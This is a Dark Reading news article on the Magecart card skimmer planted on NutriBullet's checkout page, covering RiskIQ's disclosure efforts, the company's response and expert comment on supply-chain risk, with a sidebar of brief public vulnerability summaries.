Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.


05:25 PM
Connect Directly

Skimmer May Have Put NutriBullet Customers' Card Data at Risk for Nearly a Month

Blender maker is the latest victim of Magecart.

Blender manufacturer NutriBullet on Wednesday said it had identified and removed malicious code on its website that allowed attackers to steal data from customers entering payment card information on it when purchasing products.

The move came about one month after security vendor RiskIQ first detected the malware on NutriBullet's website and apparently informed the company about it shortly thereafter. According to RiskIQ, NutriBullet did not respond to multiple attempts to alert it about the issue until today.

Researchers at RiskIQ, working in concert with ShadowServer and Abuse.ch — two malware fighting nonprofits — instead took down the domain the attackers were using to store stolen credit card data. The effort resulted in the card-skimmer being removed from NutriBullet's website on March 1, only to be replaced with a new one on March 5.

RiskIQ once again worked to neutralize the attacker's data-exfiltration domain and, in a repeat of the first time, the threat actors placed a new card skimmer on NutriBullet's website a few days later. Over the past few weeks, the criminals had access to NutriBullet's infrastructure and continued to be able replace the skimmer domain in the code to make it work again, RiskIQ said in a report Wednesday. Customers who placed orders on NutriBullet's website between February 20 and today are likely to have been affected, RiskIQ said.

In an emailed statement to Dark Reading, NutriBullet acknowledged the issue and claimed the matter had been quickly resolved. NutriBullet's statement suggested the company first learned of the skimmer today, which is at odds with RiskIQ's claims about the company having been notified previously about the issue. RiskIQ has continued to maintain that it made multiple previous attempts to reach NutriBullet.

"Our IT team immediately sprang into action this morning (3/17/20) upon first learning from RiskIQ about a possible breach," NutriBullet said. "The company's IT team promptly identified malicious code and removed it." NutriBullet said it had launched a forensic investigation to determine how the attackers had managed to place the skimmers on its website. It has also updated its security policies to include multifactor authentication.

NutriBullet is the latest victim of Magecart, a collection of hacker groups that over the last few years has stolen data on hundreds of millions of credit and debit cards by placing card-skimming software on e-commerce sites. Though each of the multiple groups has slightly different tactics and techniques, the most common has been to place skimmers on online shopping cart software or on other third-party software components that websites commonly use.

The card skimmers are designed to steal card information that customers enter into websites when making a purchase. Over the last few years, groups operating under the Magecart umbrella have compromised tens of thousands of large organizations, including Ticketmaster, British Airways, and NewEgg.

Magecart Strategy Highlights Supply Chain Risks
Yonathan Klijnsma, threat researcher at RiskIQ, says the different tactics that Magecart groups use make response harder for organizations. "The end goal is always to get the skimmer functioning on a website's checkout process, but how they place it varies widely — they do it however they can," Klijnsma says. "The same goes for their initial breaching of websites, which can be exploitation of the website [content management system] to reuse of credentials and simply logging in as an administrator."

Klijnsma says RiskIQ has been tracking Magecart activities since 2014 and therefore is able to spot attacks like the one on NutriBullet as they happen. RiskIQ has no visibility into how many purchasers on NutriBullet's website may have had their credit card information stolen, he adds. But based on how Magecart operates, it is likely that customers who shopped at the blender maker's website over the period the skimmers were on it were affected. "We didn't expect radio silence from NutriBullet, but it was sadly the case."

Lamar Bailey, senior director of security research at Tripwire, says most midsize to large companies have a formal process for reporting vulnerabilities and security issues and typically respond quickly when informed about an issue. But getting smaller companies to respond to information about a security threat on their websites can sometimes be a struggle. "I will add that it is worse for companies that develop products for the general public," such as small Internet of Things manufacturers, Bailey says. "Many of them will deprecate the product or end-of-life it instead or fixing it. This leaves customers in a bad position."

For organizations, attacks such as those involving Magecart groups highlight the importance of supply chain security because in most incidents, Magecart operators have placed card skimmers in third-party software such as shopping carts, content management systems, and visitor-tracking tools.

"With modern applications using a host of third-party libraries and services, there are ample locations to effectively poison the supply chain," says Tim Mackey, principal security strategist at Synopsys CyRC.

Therefore, for organizations, the question increasingly is about whom they can trust. When software was sourced solely from commercial vendors, the trust was inherent in the contract between the vendor and purchaser, Mackey says. But when the provenance and authorship of software is unknown, website owners need to have processing for vetting trust.

"If developers can't explain what changed in a given release, that's a problem," Mackey says. "If they can't explain how the code they depend upon gets updated, that's a problem. Both are in effect the equivalent of [saying] 'if it's on the Internet, it must be OK,'" Mackey says.

Related Content:

Check out The Edge, Dark Reading's new section for features, threat data, and in-depth perspectives. Today's featured story: "Beyond Burnout: What Is Cybersecurity Doing to Us?"

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year ... View Full Bio

Recommended Reading:

Comment  | 
Print  | 
More Insights
Oldest First  |  Newest First  |  Threaded View
FluBot Malware's Rapid Spread May Soon Hit US Phones
Kelly Sheridan, Staff Editor, Dark Reading,  4/28/2021
7 Modern-Day Cybersecurity Realities
Steve Zurier, Contributing Writer,  4/30/2021
How to Secure Employees' Home Wi-Fi Networks
Bert Kashyap, CEO and Co-Founder at SecureW2,  4/28/2021
Register for Dark Reading Newsletters
White Papers
Cartoon Contest
Current Issue
2021 Top Enterprise IT Trends
We've identified the key trends that are poised to impact the IT landscape in 2021. Find out why they're important and how they will affect you today!
Flash Poll
How Enterprises are Developing Secure Applications
How Enterprises are Developing Secure Applications
Recent breaches of third-party apps are driving many organizations to think harder about the security of their off-the-shelf software as they continue to move left in secure software development practices.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
PUBLISHED: 2021-05-07
An issue was discovered on Tenda AC11 devices with firmware through A stack buffer overflow vulnerability in /goform/setmac allows attackers to execute arbitrary code on the system via a crafted post request.
PUBLISHED: 2021-05-07
An issue was discovered on Tenda AC11 devices with firmware through A stack buffer overflow vulnerability in /gofrom/setwanType allows attackers to execute arbitrary code on the system via a crafted post request. This occurs when input vector controlled by malicious attack get copie...
PUBLISHED: 2021-05-07
An issue was discovered on Tenda AC11 devices with firmware through A stack buffer overflow vulnerability in /goform/setVLAN allows attackers to execute arbitrary code on the system via a crafted post request.
PUBLISHED: 2021-05-07
An issue was discovered on Tenda AC11 devices with firmware through A stack buffer overflow vulnerability in /goform/setportList allows attackers to execute arbitrary code on the system via a crafted post request.
PUBLISHED: 2021-05-07
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Reader User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handlin...